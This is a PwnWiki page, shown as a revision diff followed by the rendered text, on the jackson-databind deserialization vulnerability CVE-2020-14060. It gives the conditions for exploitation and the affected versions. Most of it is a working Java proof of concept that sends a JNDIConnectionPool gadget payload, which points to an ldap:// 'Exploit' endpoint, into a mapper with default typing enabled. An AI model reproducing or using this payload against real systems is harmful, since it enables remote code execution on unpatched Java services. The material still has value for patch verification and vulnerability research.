Difference between revisions of "CVE-2020-14060 FasterXML jackson-databind 反序列化漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==利用條件== </translate> <translate> 開啟enableDefaultTyping() 使用了org.apache.drill.exec:drill-jdbc-all第三方依賴 </translate> <tr...")
 
(Marked this version for translation)
 
Line 1: Line 1:
 
<languages />
 
<languages />
 
<translate>
 
<translate>
==利用條件==
+
==利用條件== <!--T:1-->
 
</translate>
 
</translate>
 
<translate>
 
<translate>
 +
<!--T:2-->
 
開啟enableDefaultTyping()
 
開啟enableDefaultTyping()
  
 +
<!--T:3-->
 
使用了org.apache.drill.exec:drill-jdbc-all第三方依賴
 
使用了org.apache.drill.exec:drill-jdbc-all第三方依賴
 
</translate>
 
</translate>
  
 
<translate>
 
<translate>
==影響版本==
+
==影響版本== <!--T:4-->
 
</translate>
 
</translate>
 
<pre>
 
<pre>

Latest revision as of 09:03, 17 June 2021

Other languages:
Chinese • ‎中文(中国大陆)‎

利用條件

開啟enableDefaultTyping()

使用了org.apache.drill.exec:drill-jdbc-all第三方依賴

影響版本

jackson-databind before 2.9.10.4
jackson-databind before 2.8.11.6
jackson-databind before 2.7.9.7

POC

package com.jacksonTest;

import com.fasterxml.jackson.databind.ObjectMapper;

import java.io.IOException;

public class Poc {
   public static void main(String[] args) throws Exception {
       ObjectMapper mapper = new ObjectMapper();
       mapper.enableDefaultTyping();
       String payload = "[\"oadd.org.apache.xalan.lib.sql.JNDIConnectionPool\",{\"jndiPath\":\"ldap://127.0.0.1:1099/Exploit\"}]";
       try {
           Object obj = mapper.readValue(payload, Object.class);
           mapper.writeValueAsString(obj);
       } catch (IOException e) {
           e.printStackTrace();
       }
   }
}
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2020-14060_FasterXML_jackson-databind_反序列化漏洞&oldid=5232"